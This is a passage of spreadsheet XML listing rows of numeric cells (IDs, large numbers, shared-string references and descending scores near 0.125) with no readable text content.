    <row r="11986" ht="15.75" customHeight="1">
      <c r="A11986" s="1">
        <v>23123.0</v>
      </c>
      <c r="B11986" s="2">
        <v>5.1307195E7</v>
      </c>
      <c r="C11986" s="2" t="s">
        <v>11509</v>
      </c>
      <c r="D11986" s="2">
        <v>1.0</v>
      </c>
      <c r="E11986" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11986" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11987" ht="15.75" customHeight="1">
      <c r="A11987" s="1">
        <v>23508.0</v>
      </c>
      <c r="B11987" s="2">
        <v>5820486.0</v>
      </c>
      <c r="C11987" s="2" t="s">
        <v>11510</v>
      </c>
      <c r="D11987" s="2">
        <v>1.0</v>
      </c>
      <c r="E11987" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11987" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11988" ht="15.75" customHeight="1">
      <c r="A11988" s="1">
        <v>24552.0</v>
      </c>
      <c r="B11988" s="2">
        <v>1.1291047E7</v>
      </c>
      <c r="C11988" s="2" t="s">
        <v>11511</v>
      </c>
      <c r="D11988" s="2">
        <v>1.0</v>
      </c>
      <c r="E11988" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11988" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11989" ht="15.75" customHeight="1">
      <c r="A11989" s="1">
        <v>25019.0</v>
      </c>
      <c r="B11989" s="2">
        <v>1.2782006E7</v>
      </c>
      <c r="C11989" s="2" t="s">
        <v>11512</v>
      </c>
      <c r="D11989" s="2">
        <v>1.0</v>
      </c>
      <c r="E11989" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11989" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11990" ht="15.75" customHeight="1">
      <c r="A11990" s="1">
        <v>27495.0</v>
      </c>
      <c r="B11990" s="2">
        <v>2.2067601E7</v>
      </c>
      <c r="C11990" s="2" t="s">
        <v>11513</v>
      </c>
      <c r="D11990" s="2">
        <v>1.0</v>
      </c>
      <c r="E11990" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11990" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11991" ht="15.75" customHeight="1">
      <c r="A11991" s="1">
        <v>28036.0</v>
      </c>
      <c r="B11991" s="2">
        <v>2.4455083E7</v>
      </c>
      <c r="C11991" s="2" t="s">
        <v>11514</v>
      </c>
      <c r="D11991" s="2">
        <v>1.0</v>
      </c>
      <c r="E11991" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11991" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11992" ht="15.75" customHeight="1">
      <c r="A11992" s="1">
        <v>30310.0</v>
      </c>
      <c r="B11992" s="2">
        <v>3.7987256E7</v>
      </c>
      <c r="C11992" s="2" t="s">
        <v>11515</v>
      </c>
      <c r="D11992" s="2">
        <v>1.0</v>
      </c>
      <c r="E11992" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11992" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11993" ht="15.75" customHeight="1">
      <c r="A11993" s="1">
        <v>30814.0</v>
      </c>
      <c r="B11993" s="2">
        <v>4531075.0</v>
      </c>
      <c r="C11993" s="2" t="s">
        <v>11516</v>
      </c>
      <c r="D11993" s="2">
        <v>1.0</v>
      </c>
      <c r="E11993" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11993" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11994" ht="15.75" customHeight="1">
      <c r="A11994" s="1">
        <v>30924.0</v>
      </c>
      <c r="B11994" s="2">
        <v>4.6962675E7</v>
      </c>
      <c r="C11994" s="2" t="s">
        <v>11517</v>
      </c>
      <c r="D11994" s="2">
        <v>1.0</v>
      </c>
      <c r="E11994" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11994" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11995" ht="15.75" customHeight="1">
      <c r="A11995" s="1">
        <v>31053.0</v>
      </c>
      <c r="B11995" s="2">
        <v>4.7975039E7</v>
      </c>
      <c r="C11995" s="2" t="s">
        <v>11518</v>
      </c>
      <c r="D11995" s="2">
        <v>1.0</v>
      </c>
      <c r="E11995" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11995" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11996" ht="15.75" customHeight="1">
      <c r="A11996" s="1">
        <v>31353.0</v>
      </c>
      <c r="B11996" s="2">
        <v>4985337.0</v>
      </c>
      <c r="C11996" s="2" t="s">
        <v>11519</v>
      </c>
      <c r="D11996" s="2">
        <v>1.0</v>
      </c>
      <c r="E11996" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11996" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11997" ht="15.75" customHeight="1">
      <c r="A11997" s="1">
        <v>2354.0</v>
      </c>
      <c r="B11997" s="2">
        <v>3.3090669E7</v>
      </c>
      <c r="C11997" s="2" t="s">
        <v>11520</v>
      </c>
      <c r="D11997" s="2">
        <v>1.0</v>
      </c>
      <c r="E11997" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11997" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="11998" ht="15.75" customHeight="1">
      <c r="A11998" s="1">
        <v>3602.0</v>
      </c>
      <c r="B11998" s="2">
        <v>3.9089675E7</v>
      </c>
      <c r="C11998" s="2" t="s">
        <v>11521</v>
      </c>
      <c r="D11998" s="2">
        <v>1.0</v>
      </c>
      <c r="E11998" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11998" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="11999" ht="15.75" customHeight="1">
      <c r="A11999" s="1">
        <v>6600.0</v>
      </c>
      <c r="B11999" s="2">
        <v>4.9012644E7</v>
      </c>
      <c r="C11999" s="2" t="s">
        <v>11522</v>
      </c>
      <c r="D11999" s="2">
        <v>1.0</v>
      </c>
      <c r="E11999" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11999" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="12000" ht="15.75" customHeight="1">
      <c r="A12000" s="1">
        <v>6763.0</v>
      </c>
      <c r="B12000" s="2">
        <v>4.9418312E7</v>
      </c>
      <c r="C12000" s="2" t="s">
        <v>11523</v>
      </c>
      <c r="D12000" s="2">
        <v>1.0</v>
      </c>
      <c r="E12000" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12000" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="12001" ht="15.75" customHeight="1">
      <c r="A12001" s="1">
        <v>16220.0</v>
      </c>
      <c r="B12001" s="2">
        <v>4.5711611E7</v>
      </c>
      <c r="C12001" s="2" t="s">
        <v>11524</v>
      </c>
      <c r="D12001" s="2">
        <v>1.0</v>
      </c>
      <c r="E12001" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12001" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="12002" ht="15.75" customHeight="1">
      <c r="A12002" s="1">
        <v>19385.0</v>
      </c>
      <c r="B12002" s="2">
        <v>5.5510232E7</v>
      </c>
      <c r="C12002" s="5" t="s">
        <v>11525</v>
      </c>
      <c r="D12002" s="2">
        <v>1.0</v>
      </c>
      <c r="E12002" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12002" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="12003" ht="15.75" customHeight="1">
      <c r="A12003" s="1">
        <v>27267.0</v>
      </c>
      <c r="B12003" s="2">
        <v>2.1171936E7</v>
      </c>
      <c r="C12003" s="2" t="s">
        <v>11526</v>
      </c>
      <c r="D12003" s="2">
        <v>1.0</v>
      </c>
      <c r="E12003" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12003" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="12004" ht="15.75" customHeight="1">
      <c r="A12004" s="1">
        <v>27998.0</v>
      </c>
      <c r="B12004" s="2">
        <v>2.4238553E7</v>
      </c>
      <c r="C12004" s="2" t="s">
        <v>11527</v>
      </c>
      <c r="D12004" s="2">
        <v>1.0</v>
      </c>
      <c r="E12004" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12004" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="12005" ht="15.75" customHeight="1">
      <c r="A12005" s="1">
        <v>32474.0</v>
      </c>
      <c r="B12005" s="2">
        <v>5689267.0</v>
      </c>
      <c r="C12005" s="2" t="s">
        <v>11528</v>
      </c>
      <c r="D12005" s="2">
        <v>1.0</v>
      </c>
      <c r="E12005" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12005" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="12006" ht="15.75" customHeight="1">
      <c r="A12006" s="1">
        <v>10208.0</v>
      </c>
      <c r="B12006" s="2">
        <v>5.7420109E7</v>
      </c>
      <c r="C12006" s="2" t="s">
        <v>11529</v>
      </c>
      <c r="D12006" s="2">
        <v>1.0</v>
      </c>
      <c r="E12006" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12006" s="2">
        <v>0.1255707762557078</v>
      </c>
    </row>
    <row r="12007" ht="15.75" customHeight="1">
      <c r="A12007" s="1">
        <v>13521.0</v>
      </c>
      <c r="B12007" s="2">
        <v>3.5512947E7</v>
      </c>
      <c r="C12007" s="2" t="s">
        <v>11530</v>
      </c>
      <c r="D12007" s="2">
        <v>1.0</v>
      </c>
      <c r="E12007" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12007" s="2">
        <v>0.1255707762557078</v>
      </c>
    </row>
    <row r="12008" ht="15.75" customHeight="1">
      <c r="A12008" s="1">
        <v>15347.0</v>
      </c>
      <c r="B12008" s="2">
        <v>4.2621712E7</v>
      </c>
      <c r="C12008" s="2" t="s">
        <v>11531</v>
      </c>
      <c r="D12008" s="2">
        <v>1.0</v>
      </c>
      <c r="E12008" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12008" s="2">
        <v>0.1254789272030652</v>
      </c>
    </row>
    <row r="12009" ht="15.75" customHeight="1">
      <c r="A12009" s="1">
        <v>5667.0</v>
      </c>
      <c r="B12009" s="2">
        <v>4.6333016E7</v>
      </c>
      <c r="C12009" s="2" t="s">
        <v>11532</v>
      </c>
      <c r="D12009" s="2">
        <v>1.0</v>
      </c>
      <c r="E12009" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12009" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="12010" ht="15.75" customHeight="1">
      <c r="A12010" s="1">
        <v>13150.0</v>
      </c>
      <c r="B12010" s="2">
        <v>3.3816107E7</v>
      </c>
      <c r="C12010" s="2" t="s">
        <v>11533</v>
      </c>
      <c r="D12010" s="2">
        <v>1.0</v>
      </c>
      <c r="E12010" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12010" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="12011" ht="15.75" customHeight="1">
      <c r="A12011" s="1">
        <v>24941.0</v>
      </c>
      <c r="B12011" s="2">
        <v>1.249413E7</v>
      </c>
      <c r="C12011" s="2" t="s">
        <v>11534</v>
      </c>
      <c r="D12011" s="2">
        <v>1.0</v>
      </c>
      <c r="E12011" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12011" s="2">
        <v>0.1254208754208755</v>
      </c>
    </row>
    <row r="12012" ht="15.75" customHeight="1">
      <c r="A12012" s="1">
        <v>12891.0</v>
      </c>
      <c r="B12012" s="2">
        <v>3.2050736E7</v>
      </c>
      <c r="C12012" s="2" t="s">
        <v>11535</v>
      </c>
      <c r="D12012" s="2">
        <v>1.0</v>
      </c>
      <c r="E12012" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12012" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="12013" ht="15.75" customHeight="1">
      <c r="A12013" s="1">
        <v>31765.0</v>
      </c>
      <c r="B12013" s="2">
        <v>5219083.0</v>
      </c>
      <c r="C12013" s="2" t="s">
        <v>11536</v>
      </c>
      <c r="D12013" s="2">
        <v>1.0</v>
      </c>
      <c r="E12013" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12013" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="12014" ht="15.75" customHeight="1">
      <c r="A12014" s="1">
        <v>11920.0</v>
      </c>
      <c r="B12014" s="2">
        <v>2.5322589E7</v>
      </c>
      <c r="C12014" s="2" t="s">
        <v>11537</v>
      </c>
      <c r="D12014" s="2">
        <v>1.0</v>
      </c>
      <c r="E12014" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12014" s="2">
        <v>0.125207296849088</v>
      </c>
    </row>
    <row r="12015" ht="15.75" customHeight="1">
      <c r="A12015" s="1">
        <v>15549.0</v>
      </c>
      <c r="B12015" s="2">
        <v>4.3398524E7</v>
      </c>
      <c r="C12015" s="2" t="s">
        <v>11538</v>
      </c>
      <c r="D12015" s="2">
        <v>1.0</v>
      </c>
      <c r="E12015" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12015" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="12016" ht="15.75" customHeight="1">
      <c r="A12016" s="1">
        <v>26357.0</v>
      </c>
      <c r="B12016" s="2">
        <v>1.6838601E7</v>
      </c>
      <c r="C12016" s="2" t="s">
        <v>11539</v>
      </c>
      <c r="D12016" s="2">
        <v>1.0</v>
      </c>
      <c r="E12016" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12016" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="12017" ht="15.75" customHeight="1">
      <c r="A12017" s="1">
        <v>2891.0</v>
      </c>
      <c r="B12017" s="2">
        <v>3.5723393E7</v>
      </c>
      <c r="C12017" s="2" t="s">
        <v>11540</v>
      </c>
      <c r="D12017" s="2">
        <v>1.0</v>
      </c>
      <c r="E12017" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12017" s="2">
        <v>0.1247723132969034</v>
      </c>
    </row>
    <row r="12018" ht="15.75" customHeight="1">
      <c r="A12018" s="1">
        <v>4534.0</v>
      </c>
      <c r="B12018" s="2">
        <v>4.2659056E7</v>
      </c>
      <c r="C12018" s="2" t="s">
        <v>11541</v>
      </c>
      <c r="D12018" s="2">
        <v>1.0</v>
      </c>
      <c r="E12018" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12018" s="2">
        <v>0.1247379454926625</v>
      </c>
    </row>
    <row r="12019" ht="15.75" customHeight="1">
      <c r="A12019" s="1">
        <v>26961.0</v>
      </c>
      <c r="B12019" s="2">
        <v>1.9640834E7</v>
      </c>
      <c r="C12019" s="2" t="s">
        <v>11542</v>
      </c>
      <c r="D12019" s="2">
        <v>1.0</v>
      </c>
      <c r="E12019" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12019" s="2">
        <v>0.1247379454926625</v>
      </c>
    </row>
    <row r="12020" ht="15.75" customHeight="1">
      <c r="A12020" s="1">
        <v>14524.0</v>
      </c>
      <c r="B12020" s="2">
        <v>3.9782655E7</v>
      </c>
      <c r="C12020" s="2" t="s">
        <v>11543</v>
      </c>
      <c r="D12020" s="2">
        <v>1.0</v>
      </c>
      <c r="E12020" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12020" s="2">
        <v>0.1245519713261649</v>
      </c>
    </row>
    <row r="12021" ht="15.75" customHeight="1">
      <c r="A12021" s="1">
        <v>6681.0</v>
      </c>
      <c r="B12021" s="2">
        <v>4.9171236E7</v>
      </c>
      <c r="C12021" s="2" t="s">
        <v>11544</v>
      </c>
      <c r="D12021" s="2">
        <v>1.0</v>
      </c>
      <c r="E12021" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12021" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="12022" ht="15.75" customHeight="1">
      <c r="A12022" s="1">
        <v>14561.0</v>
      </c>
      <c r="B12022" s="2">
        <v>4.0041668E7</v>
      </c>
      <c r="C12022" s="2" t="s">
        <v>11545</v>
      </c>
      <c r="D12022" s="2">
        <v>1.0</v>
      </c>
      <c r="E12022" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12022" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="12023" ht="15.75" customHeight="1">
      <c r="A12023" s="1">
        <v>15331.0</v>
      </c>
      <c r="B12023" s="2">
        <v>4.2557691E7</v>
      </c>
      <c r="C12023" s="2" t="s">
        <v>11546</v>
      </c>
      <c r="D12023" s="2">
        <v>1.0</v>
      </c>
      <c r="E12023" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12023" s="2">
        <v>0.1244131455399062</v>
      </c>
    </row>
    <row r="12024" ht="15.75" customHeight="1">
      <c r="A12024" s="1">
        <v>17676.0</v>
      </c>
      <c r="B12024" s="2">
        <v>5.048974E7</v>
      </c>
      <c r="C12024" s="2" t="s">
        <v>11547</v>
      </c>
      <c r="D12024" s="2">
        <v>1.0</v>
      </c>
      <c r="E12024" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12024" s="2">
        <v>0.1243386243386244</v>
      </c>
    </row>
    <row r="12025" ht="15.75" customHeight="1">
      <c r="A12025" s="1">
        <v>5642.0</v>
      </c>
      <c r="B12025" s="2">
        <v>4.626261E7</v>
      </c>
      <c r="C12025" s="2" t="s">
        <v>11548</v>
      </c>
      <c r="D12025" s="2">
        <v>1.0</v>
      </c>
      <c r="E12025" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12025" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="12026" ht="15.75" customHeight="1">
      <c r="A12026" s="1">
        <v>6004.0</v>
      </c>
      <c r="B12026" s="2">
        <v>4.7469722E7</v>
      </c>
      <c r="C12026" s="2" t="s">
        <v>11549</v>
      </c>
      <c r="D12026" s="2">
        <v>1.0</v>
      </c>
      <c r="E12026" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12026" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="12027" ht="15.75" customHeight="1">
      <c r="A12027" s="1">
        <v>6874.0</v>
      </c>
      <c r="B12027" s="2">
        <v>4.9704021E7</v>
      </c>
      <c r="C12027" s="2" t="s">
        <v>11550</v>
      </c>
      <c r="D12027" s="2">
        <v>1.0</v>
      </c>
      <c r="E12027" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12027" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="12028" ht="15.75" customHeight="1">
      <c r="A12028" s="1">
        <v>9345.0</v>
      </c>
      <c r="B12028" s="2">
        <v>5.5658422E7</v>
      </c>
      <c r="C12028" s="2" t="s">
        <v>11551</v>
      </c>
      <c r="D12028" s="2">
        <v>1.0</v>
      </c>
      <c r="E12028" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12028" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="12029" ht="15.75" customHeight="1">
      <c r="A12029" s="1">
        <v>13679.0</v>
      </c>
      <c r="B12029" s="2">
        <v>3.6061022E7</v>
      </c>
      <c r="C12029" s="2" t="s">
        <v>11552</v>
      </c>
      <c r="D12029" s="2">
        <v>1.0</v>
      </c>
      <c r="E12029" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12029" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="12030" ht="15.75" customHeight="1">
      <c r="A12030" s="1">
        <v>16738.0</v>
      </c>
      <c r="B12030" s="2">
        <v>4.7541482E7</v>
      </c>
      <c r="C12030" s="2" t="s">
        <v>11553</v>
      </c>
      <c r="D12030" s="2">
        <v>1.0</v>
      </c>
      <c r="E12030" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12030" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="12031" ht="15.75" customHeight="1">
      <c r="A12031" s="1">
        <v>24960.0</v>
      </c>
      <c r="B12031" s="2">
        <v>1.2598405E7</v>
      </c>
      <c r="C12031" s="2" t="s">
        <v>11554</v>
      </c>
      <c r="D12031" s="2">
        <v>1.0</v>
      </c>
      <c r="E12031" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12031" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="12032" ht="15.75" customHeight="1">
      <c r="A12032" s="1">
        <v>17671.0</v>
      </c>
      <c r="B12032" s="2">
        <v>5.048974E7</v>
      </c>
      <c r="C12032" s="2" t="s">
        <v>11555</v>
      </c>
      <c r="D12032" s="2">
        <v>1.0</v>
      </c>
      <c r="E12032" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12032" s="2">
        <v>0.1242197253433209</v>
      </c>
    </row>
    <row r="12033" ht="15.75" customHeight="1">
      <c r="A12033" s="1">
        <v>5776.0</v>
      </c>
      <c r="B12033" s="2">
        <v>4.6732017E7</v>
      </c>
      <c r="C12033" s="2" t="s">
        <v>11556</v>
      </c>
      <c r="D12033" s="2">
        <v>1.0</v>
      </c>
      <c r="E12033" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12033" s="2">
        <v>0.1241319444444445</v>
      </c>
    </row>
    <row r="12034" ht="15.75" customHeight="1">
      <c r="A12034" s="1">
        <v>1177.0</v>
      </c>
      <c r="B12034" s="2">
        <v>2.4637763E7</v>
      </c>
      <c r="C12034" s="2" t="s">
        <v>11557</v>
      </c>
      <c r="D12034" s="2">
        <v>1.0</v>
      </c>
      <c r="E12034" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12034" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="12035" ht="15.75" customHeight="1">
      <c r="A12035" s="1">
        <v>3473.0</v>
      </c>
      <c r="B12035" s="2">
        <v>3.8350464E7</v>
      </c>
      <c r="C12035" s="2" t="s">
        <v>11558</v>
      </c>
      <c r="D12035" s="2">
        <v>1.0</v>
      </c>
      <c r="E12035" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12035" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="12036" ht="15.75" customHeight="1">
      <c r="A12036" s="1">
        <v>6414.0</v>
      </c>
      <c r="B12036" s="2">
        <v>4.8540212E7</v>
      </c>
      <c r="C12036" s="2" t="s">
        <v>11559</v>
      </c>
      <c r="D12036" s="2">
        <v>1.0</v>
      </c>
      <c r="E12036" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12036" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="12037" ht="15.75" customHeight="1">
      <c r="A12037" s="1">
        <v>8499.0</v>
      </c>
      <c r="B12037" s="2">
        <v>5.404648E7</v>
      </c>
      <c r="C12037" s="2" t="s">
        <v>11560</v>
      </c>
      <c r="D12037" s="2">
        <v>1.0</v>
      </c>
      <c r="E12037" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12037" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="12038" ht="15.75" customHeight="1">
      <c r="A12038" s="1">
        <v>8523.0</v>
      </c>
      <c r="B12038" s="2">
        <v>5.4091829E7</v>
      </c>
      <c r="C12038" s="2" t="s">
        <v>11561</v>
      </c>
      <c r="D12038" s="2">
        <v>1.0</v>
      </c>
      <c r="E12038" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12038" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="12039" ht="15.75" customHeight="1">
      <c r="A12039" s="1">
        <v>11130.0</v>
      </c>
      <c r="B12039" s="2">
        <v>1.9120755E7</v>
      </c>
      <c r="C12039" s="2" t="s">
        <v>11562</v>
      </c>
      <c r="D12039" s="2">
        <v>1.0</v>
      </c>
      <c r="E12039" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12039" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="12040" ht="15.75" customHeight="1">
      <c r="A12040" s="1">
        <v>14786.0</v>
      </c>
      <c r="B12040" s="2">
        <v>4.0918163E7</v>
      </c>
      <c r="C12040" s="2" t="s">
        <v>11563</v>
      </c>
      <c r="D12040" s="2">
        <v>1.0</v>
      </c>
      <c r="E12040" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12040" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="12041" ht="15.75" customHeight="1">
      <c r="A12041" s="1">
        <v>22883.0</v>
      </c>
      <c r="B12041" s="2">
        <v>4.7740993E7</v>
      </c>
      <c r="C12041" s="2" t="s">
        <v>11564</v>
      </c>
      <c r="D12041" s="2">
        <v>1.0</v>
      </c>
      <c r="E12041" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12041" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="12042" ht="15.75" customHeight="1">
      <c r="A12042" s="1">
        <v>32037.0</v>
      </c>
      <c r="B12042" s="2">
        <v>5.3656314E7</v>
      </c>
      <c r="C12042" s="2" t="s">
        <v>11565</v>
      </c>
      <c r="D12042" s="2">
        <v>1.0</v>
      </c>
      <c r="E12042" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12042" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="12043" ht="15.75" customHeight="1">
      <c r="A12043" s="1">
        <v>31073.0</v>
      </c>
      <c r="B12043" s="2">
        <v>4.8281671E7</v>
      </c>
      <c r="C12043" s="2" t="s">
        <v>11526</v>
      </c>
      <c r="D12043" s="2">
        <v>1.0</v>
      </c>
      <c r="E12043" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12043" s="2">
        <v>0.123931623931624</v>
      </c>
    </row>
    <row r="12044" ht="15.75" customHeight="1">
      <c r="A12044" s="1">
        <v>7944.0</v>
      </c>
      <c r="B12044" s="2">
        <v>5.2633238E7</v>
      </c>
      <c r="C12044" s="2" t="s">
        <v>11566</v>
      </c>
      <c r="D12044" s="2">
        <v>1.0</v>
      </c>
      <c r="E12044" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12044" s="2">
        <v>0.1239316239316239</v>
      </c>
    </row>
    <row r="12045" ht="15.75" customHeight="1">
      <c r="A12045" s="1">
        <v>11163.0</v>
      </c>
      <c r="B12045" s="2">
        <v>1.955292E7</v>
      </c>
      <c r="C12045" s="2" t="s">
        <v>11567</v>
      </c>
      <c r="D12045" s="2">
        <v>1.0</v>
      </c>
      <c r="E12045" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12045" s="2">
        <v>0.1238738738738739</v>
      </c>
    </row>
    <row r="12046" ht="15.75" customHeight="1">
      <c r="A12046" s="1">
        <v>25290.0</v>
      </c>
      <c r="B12046" s="2">
        <v>1.3403713E7</v>
      </c>
      <c r="C12046" s="2" t="s">
        <v>11568</v>
      </c>
      <c r="D12046" s="2">
        <v>1.0</v>
      </c>
      <c r="E12046" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12046" s="2">
        <v>0.1238738738738739</v>
      </c>
    </row>
    <row r="12047" ht="15.75" customHeight="1">
      <c r="A12047" s="1">
        <v>7991.0</v>
      </c>
      <c r="B12047" s="2">
        <v>5.2755182E7</v>
      </c>
      <c r="C12047" s="2" t="s">
        <v>11569</v>
      </c>
      <c r="D12047" s="2">
        <v>1.0</v>
      </c>
      <c r="E12047" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12047" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="12048" ht="15.75" customHeight="1">
      <c r="A12048" s="1">
        <v>11678.0</v>
      </c>
      <c r="B12048" s="2">
        <v>2.3432299E7</v>
      </c>
      <c r="C12048" s="2" t="s">
        <v>11570</v>
      </c>
      <c r="D12048" s="2">
        <v>1.0</v>
      </c>
      <c r="E12048" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12048" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="12049" ht="15.75" customHeight="1">
      <c r="A12049" s="1">
        <v>13287.0</v>
      </c>
      <c r="B12049" s="2">
        <v>3.4431437E7</v>
      </c>
      <c r="C12049" s="2" t="s">
        <v>11571</v>
      </c>
      <c r="D12049" s="2">
        <v>1.0</v>
      </c>
      <c r="E12049" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12049" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="12050" ht="15.75" customHeight="1">
      <c r="A12050" s="1">
        <v>15198.0</v>
      </c>
      <c r="B12050" s="2">
        <v>4.2069036E7</v>
      </c>
      <c r="C12050" s="2" t="s">
        <v>11572</v>
      </c>
      <c r="D12050" s="2">
        <v>1.0</v>
      </c>
      <c r="E12050" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12050" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="12051" ht="15.75" customHeight="1">
      <c r="A12051" s="1">
        <v>18215.0</v>
      </c>
      <c r="B12051" s="2">
        <v>5.2079926E7</v>
      </c>
      <c r="C12051" s="2" t="s">
        <v>11573</v>
      </c>
      <c r="D12051" s="2">
        <v>1.0</v>
      </c>
      <c r="E12051" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12051" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="12052" ht="15.75" customHeight="1">
      <c r="A12052" s="1">
        <v>22294.0</v>
      </c>
      <c r="B12052" s="2">
        <v>3.3521156E7</v>
      </c>
      <c r="C12052" s="2" t="s">
        <v>11574</v>
      </c>
      <c r="D12052" s="2">
        <v>1.0</v>
      </c>
      <c r="E12052" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12052" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
